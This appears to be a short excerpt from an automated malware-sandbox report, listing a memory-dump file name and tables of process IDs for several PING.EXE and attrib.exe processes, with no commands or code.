memory/6132-1539-0x0000000000000000-mapping.dmp

Download

pid	process
3008	PING.EXE
2128	PING.EXE
2296	PING.EXE
2672	PING.EXE
3816	PING.EXE
2164	PING.EXE
3668	PING.EXE
5064	PING.EXE
4320	PING.EXE
2548	PING.EXE
4052	PING.EXE

pid	process
3248	attrib.exe
3640	attrib.exe
2576	attrib.exe
2892	attrib.exe
476	attrib.exe